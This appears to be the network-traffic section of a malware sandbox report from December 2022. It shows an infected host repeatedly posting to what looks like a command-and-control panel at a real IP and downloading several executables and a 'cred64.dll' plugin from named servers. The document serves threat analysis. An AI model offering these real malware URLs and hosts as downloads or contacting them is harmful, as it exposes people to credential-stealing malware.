Network Analysis

POST /p9cWxH/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODY5OTc= Host: 62.204.41.6 Content-Length: 87149 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:45:39 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:45:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /lego/5jk29l2fg.exe HTTP/1.1 Host: 31.41.244.188

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 07 Dec 2022 06:45:37 GMT Content-Type: application/octet-stream Content-Length: 806400 Last-Modified: Tue, 06 Dec 2022 16:26:01 GMT Connection: keep-alive ETag: "638f6d19-c4e00" Accept-Ranges: bytes

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:45:44 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /wp-content/file.exe HTTP/1.1 Host: www.time4unow.com

HTTP/1.1 302 Found Date: Wed, 07 Dec 2022 06:45:45 GMT Server: Apache Location: https://www.time4unow.com/wp-content/file.exe Content-Length: 229 Content-Type: text/html; charset=iso-8859-1

GET /wp-content/file.exe HTTP/1.1 Host: www.time4unow.com

HTTP/1.1 302 Found Date: Wed, 07 Dec 2022 06:45:52 GMT Server: Apache Location: https://www.time4unow.com/wp-content/file.exe Content-Length: 229 Content-Type: text/html; charset=iso-8859-1

GET /wp-content/file.exe HTTP/1.1 Host: www.time4unow.com

HTTP/1.1 302 Found Date: Wed, 07 Dec 2022 06:46:00 GMT Server: Apache Location: https://www.time4unow.com/wp-content/file.exe Content-Length: 229 Content-Type: text/html; charset=iso-8859-1

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:07 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /miha/wish.exe HTTP/1.1 Host: 31.41.244.188

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 07 Dec 2022 06:46:07 GMT Content-Type: application/octet-stream Content-Length: 179200 Last-Modified: Mon, 05 Dec 2022 21:37:33 GMT Connection: keep-alive ETag: "638e649d-2bc00" Accept-Ranges: bytes

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:13 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /new/linda5.exe HTTP/1.1 Host: 31.41.244.188

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 07 Dec 2022 06:46:13 GMT Content-Type: application/octet-stream Content-Length: 1662100 Last-Modified: Wed, 07 Dec 2022 06:36:14 GMT Connection: keep-alive ETag: "6390345e-195c94" Accept-Ranges: bytes

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:20 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /ano/anon.exe HTTP/1.1 Host: 31.41.244.188

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 07 Dec 2022 06:46:20 GMT Content-Type: application/octet-stream Content-Length: 179200 Last-Modified: Tue, 06 Dec 2022 21:16:48 GMT Connection: keep-alive ETag: "638fb140-2bc00" Accept-Ranges: bytes

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:26 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16

GET /files/pe/pb1109.exe HTTP/1.1 Host: byh.ajn322bb.com

HTTP/1.1 200 OK Date: Wed, 07 Dec 2022 06:46:26 GMT Content-Type: application/octet-stream Content-Length: 3662336 Connection: keep-alive Last-Modified: Sun, 04 Dec 2022 03:12:01 GMT ETag: "638c1001-37e200" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1290 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LUVGRQlY%2BzrNP%2FvgZ%2BbF4z4kxLKfoKNa%2Bv58eLFPUm7mzNFBVUELgeUQb2eEAGUcs6I2ttu7UPBKlIypc956QrQX8BUEknXr2jqPTxWroEu4DjviSKtLOmHd%2F0xJq3r9JSoW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 775b4de0795719f0-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

GET /p9cWxH/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.6

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:27 GMT Content-Type: application/octet-stream Content-Length: 129024 Connection: keep-alive Last-Modified: Sat, 03 Dec 2022 13:47:00 GMT ETag: "1f800-5eeecb04a4ba8" Accept-Ranges: bytes

POST /p9cWxH/index.php HTTP/1.1 Host: 62.204.41.6 Content-Length: 21 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:28 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16 Refresh: 0; url = Login.php

POST /p9cWxH/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.6 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 07 Dec 2022 06:46:32 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.4.16